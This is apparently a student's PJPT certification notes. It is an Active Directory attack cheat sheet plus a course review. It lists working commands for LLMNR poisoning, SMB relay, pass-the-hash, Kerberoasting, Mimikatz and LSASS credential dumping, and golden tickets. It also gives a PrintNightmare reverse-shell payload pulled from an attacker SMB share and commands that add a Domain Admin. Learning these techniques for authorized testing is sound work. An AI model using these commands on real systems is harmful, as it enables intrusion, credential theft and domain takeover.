PJPT Certification Notes
Overview
The PJPT (Practical Junior Penetration Tester) certification is offered by TCM Security and is built around the Practical Ethical Hacking (PEH) course. The course covers topics ranging from Active Directory attacks to exploitation of known CVEs, delivered through videos, labs and quizzes.
Network Enumeration
Basic Network Scanning
# ARP scan of the local subnet (needs root)
sudo arp-scan -l
# Network discovery on a chosen range (needs root)
sudo netdiscover -r 192.168.5.0/24
# Full-port scans: -A enables OS/version detection, default scripts and traceroute;
# run as root so nmap can use a SYN scan (-sS), which is also what -A defaults to
sudo nmap -T4 -p- -A 192.168.5.0/24
sudo nmap -T4 -p- -A 192.168.5.1
sudo nmap -T4 -p- -sS -sC 192.168.5.0/24
Active Directory Attacks
LLMNR Poisoning
- Capture NetNTLMv2 hashes using Responder (-I interface, -d answer DHCP, -P force NTLM authentication on the proxy). Hashes arrive when a host falls back to LLMNR/NBT-NS, typically after a user mistypes a share or hostname:
sudo responder -I tun0 -dP
- Crack captured hashes (mode 5600 is NetNTLMv2):
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
SMB Relay Attack
Prerequisites: SMB signing must not be required on the targets (either disabled, or "enabled but not required", which is the default on Windows workstations). The relayed user also needs local administrator rights on the target, and a host can never be relayed to itself, so the machine the authentication comes from must not be in the target list.
- Check SMB signing status:
nmap -p445 192.168.5.0/24 --script=smb2-security-mode
- Configure Responder:
sudo nano /etc/responder/Responder.conf
# Set:
# SMB = Off
# HTTP = Off
- Execute the relay (keep Responder running alongside so it keeps poisoning; -smb2support is needed for modern targets):
# For hash dumping (dumps the local SAM of every target the relayed user is admin on)
sudo ntlmrelayx.py -tf targets.txt -smb2support
# For interactive shell (the SMB shell is bound locally, connect with: nc 127.0.0.1 11000)
sudo ntlmrelayx.py -tf targets.txt -smb2support -i
# For command execution
sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
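Building targets.txt by hand from the nmap output is error-prone, so here is an added helper that is not part of the course or my notes. It assumes the signing scan above was saved with -oN smb_signing.nmap and that the attacker box is 192.168.5.100 (both assumptions); the sample scan output embedded below is constructed. It keeps only hosts whose signing is not required and drops our own address, since a host cannot be relayed to itself.

```shell
#!/bin/sh
# Added example (not from the PEH course): turn nmap smb2-security-mode output
# into an ntlmrelayx target list. Assumes the scan was saved with
#   nmap -p445 192.168.5.0/24 --script=smb2-security-mode -oN smb_signing.nmap
# Hosts that require signing are dropped; our own IP is dropped too, because a
# host can never be relayed to itself.

# relay_targets FILE [SELF_IP]  -> prints one relayable host per line
relay_targets() {
    awk -v self="$2" '
        # remember which host the following "Host script results" belong to;
        # nmap prints "report for name (ip)" when it resolved a hostname
        /^Nmap scan report for/ { host = $NF; gsub(/[()]/, "", host) }
        # smb2-security-mode wording, then smb-security-mode (SMB1) wording
        /Message signing enabled but not required/ || /Message signing disabled/ ||
        /message_signing: supported/ || /message_signing: disabled/ {
            if (host != "" && host != self) { print host; host = "" }
        }
    ' "$1"
}

# Constructed sample scan output (three hosts, one per signing state)
SAMPLE_SCAN='Nmap scan report for dc01.test.local (192.168.5.1)
Host is up (0.00050s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 192.168.5.2
Host is up (0.00061s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for 192.168.5.3
Host is up (0.00044s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing disabled and dangerous'

scan_file=$(mktemp)
printf '%s\n' "$SAMPLE_SCAN" > "$scan_file"
ATTACKER_IP=192.168.5.100   # assumption: the Kali box running Responder/ntlmrelayx
relay_targets "$scan_file" "$ATTACKER_IP"   # prints 192.168.5.2 and 192.168.5.3; the DC is skipped
# Real run:
#   relay_targets smb_signing.nmap "$ATTACKER_IP" > targets.txt
#   sudo ntlmrelayx.py -tf targets.txt -smb2support
```

Domain controllers require signing by default, which is why the DC never shows up in the list; if it does, double-check the scan before relaying to it.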
Shell Access Methods
PSExec
# Domain user
psexec.py test.local/fcastle:'Password1'@192.168.5.1
# Local user
psexec.py fcastle:'Password1'@192.168.5.1
# Pass-the-hash (the LM half can be the empty LM hash aad3b435b51404eeaad3b435b51404ee, only the NT hash matters)
psexec.py Administrator@192.168.5.1 --hashes [LM-hash]:[NTLM-hash]
WMIExec
wmiexec.py Administrator@192.168.5.1 --hashes [LM-hash]:[NTLM-hash]
SMBExec
smbexec.py test.local/fcastle:'Password1'@192.168.5.1
Metasploit PSExec
use exploit/windows/smb/psexec
set SMBDomain test.local
set SMBUser fcastle
set SMBPass Password1
set RHOSTS 192.168.5.2
IPv6 Attacks
Windows prefers IPv6 over IPv4, and most networks leave IPv6 enabled without running their own DHCPv6/DNS server. mitm6 answers the DHCPv6 requests, hands itself out as the DNS server and can then redirect WPAD and NTLM authentication into ntlmrelayx:
- Start mitm6:
sudo mitm6 -d test.local
- Configure NTLM relay:
ntlmrelayx.py -6 -t ldaps://192.168.5.1 -wh fakewpad.test.local -l lootme
Results are written to the -l directory (here lootme), e.g. /home/kali/lootme/domain_computers.html when run from the Kali home directory. If a domain admin authenticates during the relay, ntlmrelayx can also create a new user or computer account through LDAP.
Post-Compromise Enumeration
LDAP Domain Dump
sudo ldapdomaindump ldaps://192.168.5.1 -u 'test.local\fcastle' -p Password1
firefox domain_*.html
BloodHound
- Collect data:
sudo bloodhound-python -d test.local -u fcastle -p Password1 -ns 192.168.5.1 -c all
- Start services:
sudo neo4j console
sudo bloodhound
PlumHound
# PlumHound runs reports against the same neo4j database; -p is the neo4j password
sudo python3 PlumHound.py --easy -p [PASSWORD]
sudo python3 PlumHound.py -x tasks/default.tasks -p [PASSWORD]
Post-Compromise Attacks
Pass-the-Hash
- Test credentials:
# With password
crackmapexec smb 192.168.5.0/24 -d test.local -u fcastle -p Password1
# With hash (domain account); add --local-auth to spray a local Administrator NT hash instead
crackmapexec smb 192.168.5.0/24 -d test.local -u administrator -H [NT-HASH]
- Dump hashes (needs local admin on the target):
# Using Secretsdump (use / as the domain separator: an unquoted backslash is eaten by bash)
secretsdump.py test.local/fcastle:Password1@192.168.5.2
# Using hash
secretsdump.py administrator@192.168.5.3 --hashes [LM-HASH]:[NT-HASH]
Kerberoasting
- Request a TGS for every account that has an SPN (any domain user can do this) and save the tickets:
python3 GetUserSPNs.py test.local/fcastle:Password1 -dc-ip 192.168.5.1 -request -outputfile SPNs-hash.txt
- Crack tickets (mode 13100 is for RC4-encrypted tickets, etype 23, which is what the course targets):
hashcat -m 13100 SPNs-hash.txt /usr/share/wordlists/rockyou.txt
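Accounts configured for AES come back with etype 17 or 18 tickets, which hashcat will not accept in a -m 13100 run (it rejects a file mixing formats). The added script below, not from the course or my notes, reads the -outputfile and sorts tickets into one file per hashcat mode: etype 23 to 13100, etype 17 to 19600, etype 18 to 19700. The ticket file name and the three sample tickets (constructed, with truncated hex) are assumptions.

```shell
#!/bin/sh
# Added example (not from the PEH course): pick the right hashcat mode for each
# Kerberoasted ticket. Assumes tickets were saved with
#   GetUserSPNs.py test.local/fcastle:Password1 -dc-ip 192.168.5.1 -request -outputfile SPNs-hash.txt
# Impacket writes:
#   etype 23 (RC4-HMAC) -> $krb5tgs$23$*user$REALM$spn*$checksum$cipher  -> hashcat -m 13100
#   etype 17 (AES128)   -> $krb5tgs$17$user$REALM$*spn*$checksum$cipher  -> hashcat -m 19600
#   etype 18 (AES256)   -> $krb5tgs$18$user$REALM$*spn*$checksum$cipher  -> hashcat -m 19700

# hashcat_mode ETYPE -> hashcat mode number, or "unknown"
hashcat_mode() {
    case "$1" in
        23) echo 13100 ;;
        17) echo 19600 ;;
        18) echo 19700 ;;
        *)  echo unknown ;;
    esac
}

# ticket_summary FILE -> "user etype mode" per ticket (fields are $-separated)
ticket_summary() {
    while IFS= read -r line; do
        case "$line" in '$krb5tgs$'*) ;; *) continue ;; esac
        etype=$(printf '%s\n' "$line" | cut -d'$' -f3)
        user=$(printf '%s\n' "$line" | cut -d'$' -f4 | tr -d '*')   # RC4 entries wrap the user in *...*
        echo "$user $etype $(hashcat_mode "$etype")"
    done < "$1"
}

# split_by_mode FILE OUTDIR -> appends each ticket to OUTDIR/<mode>.txt
split_by_mode() {
    while IFS= read -r line; do
        case "$line" in '$krb5tgs$'*) ;; *) continue ;; esac
        etype=$(printf '%s\n' "$line" | cut -d'$' -f3)
        printf '%s\n' "$line" >> "$2/$(hashcat_mode "$etype").txt"
    done < "$1"
}

# Constructed sample tickets (hex parts shortened; real ones are thousands of characters)
tickets=$(mktemp)
cat > "$tickets" <<'EOF'
$krb5tgs$23$*sqlservice$TEST.LOCAL$test.local/sqlservice*$1f2e3d4c5b6a79880011223344556677$aa11bb22cc33dd44ee55ff6600112233
$krb5tgs$23$*httpsvc$TEST.LOCAL$test.local/httpsvc*$0a1b2c3d4e5f60718293a4b5c6d7e8f9$99887766554433221100ffeeddccbbaa
$krb5tgs$18$backupsvc$TEST.LOCAL$*test.local/backupsvc*$ab12cd34ef56ab78$0123456789abcdef0123456789abcdef
EOF

ticket_summary "$tickets"        # sqlservice 23 13100 / httpsvc 23 13100 / backupsvc 18 19700
outdir=$(mktemp -d)
split_by_mode "$tickets" "$outdir"
for f in "$outdir"/*.txt; do     # one hashcat invocation per mode
    mode=$(basename "$f" .txt)
    [ "$mode" = unknown ] && continue
    echo "hashcat -m $mode $f /usr/share/wordlists/rockyou.txt"
done
```

AES tickets crack far more slowly than RC4 ones, so if an account hands out etype 18 only, it is usually better to spend the cracking time on the RC4 file first.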
Token Impersonation
meterpreter > list_tokens -u
meterpreter > impersonate_token test\\administrator
Credential Dumping
Mimikatz
mimikatz(powershell) # privilege::debug
mimikatz(powershell) # lsadump::lsa /patch
mimikatz(powershell) # sekurlsa::logonPasswords
ProcDump
procdump.exe -accepteula -ma lsass.exe out.dmp
Domain Privilege Escalation
# Create a domain user (run from a session that already has Domain Admin rights)
net user pentester "StrongPassword123!" /add /domain
# Add to Domain Admins
net group "Domain Admins" pentester /add /domain
Advanced Attacks
ZeroLogon
Warning: the full exploit resets the domain controller's machine account password to an empty value, which breaks replication and authentication unless the original password is restored afterwards. Only run the exploit with explicit client approval. The tester below only checks whether the DC is vulnerable and makes no changes; DC-01 is the DC's NetBIOS name.
Test for vulnerability:
git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472
python3 zerologon_tester.py DC-01 192.168.5.1
PrintNightmare
Remote Code Execution
- Check whether the Print Spooler RPC interfaces (MS-RPRN, MS-PAR) are exposed; if they are, the spooler is reachable and worth testing:
rpcdump.py @192.168.5.3 | egrep 'MS-RPRN|MS-PAR'
- Execute attack:
# Create payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACKER-IP> LPORT=5555 -f dll > shell.dll
# Start the listener before firing the exploit
msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST <ATTACKER-IP>; set LPORT 5555; run"
# Share payload
smbserver.py share . -smb2support
# Execute exploit (any domain user will do; the DLL is loaded by the spooler as SYSTEM)
python3 CVE-2021-1675.py test.local/fcastle:Password1@192.168.5.2 '\\<ATTACKER-IP>\share\shell.dll'
Local Privilege Escalation
# Run on the target as a low-privileged user; Invoke-Nightmare abuses the local spooler to create a new local administrator
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DriverName "Xerox" -NewUser "pentester" -NewPassword "StrongPassword123!"
Domain Takeover Techniques
NTDS.dit Extraction
# Needs Domain Admin (or an account with replication rights); -just-dc-ntlm dumps only the NT hashes from NTDS.dit via DCSync
secretsdump.py test.local/fcastle:Password1@192.168.5.2 -just-dc-ntlm
Golden Ticket Attack
# In Mimikatz (on a domain controller):
privilege::debug
lsadump::lsa /inject /name:krbtgt
# /sid is the domain SID (a user SID minus its trailing RID); /krbtgt is the 32-hex NT hash printed by the lsadump command above
kerberos::golden /User:Administrator /domain:test.local /sid:S-1-5-21-3311685201-1443070845-3622335404 /krbtgt:[KRBTGT-NT-HASH] /id:500 /ptt
misc::cmd
My honest review
I have completed the PJPT certification and I must say that it was a great experience. For 200€, I couldn't ask for more. It provides what it promised: a practical approach to ethical hacking.
Successfully compromising the Active Directory domain within 5 hours was such a great feeling. The system was stable and the labs were well prepared.
But if possible, I would like to have more pivoting and lateral movement in the exam. It would be great to have more real-world scenarios.
Report writing is painful for me; even though I hold a MOS certification in Word, I still struggle with the report writing. I would prefer to use LaTeX or Markdown for the report. But it is what it is, Word is the standard in the industry.
Tips
- Do not overthink the exam, it is not that hard. I had prior experience in CTFs and pentesting, so I sometimes overthought the questions. The exam is straightforward, just follow the instructions and you will be fine.
- Practice all the labs. The labs are the most important part of the course. It is where you will learn the most. Do not skip any of them.
- Take notes, every single one of them. I took notes during the exam and it helped me a lot. I was able to refer back to my notes when I was stuck.
- Do not rush. The exam is 2 days long, you have plenty of time. Rest well to gain energy and focus on the exam.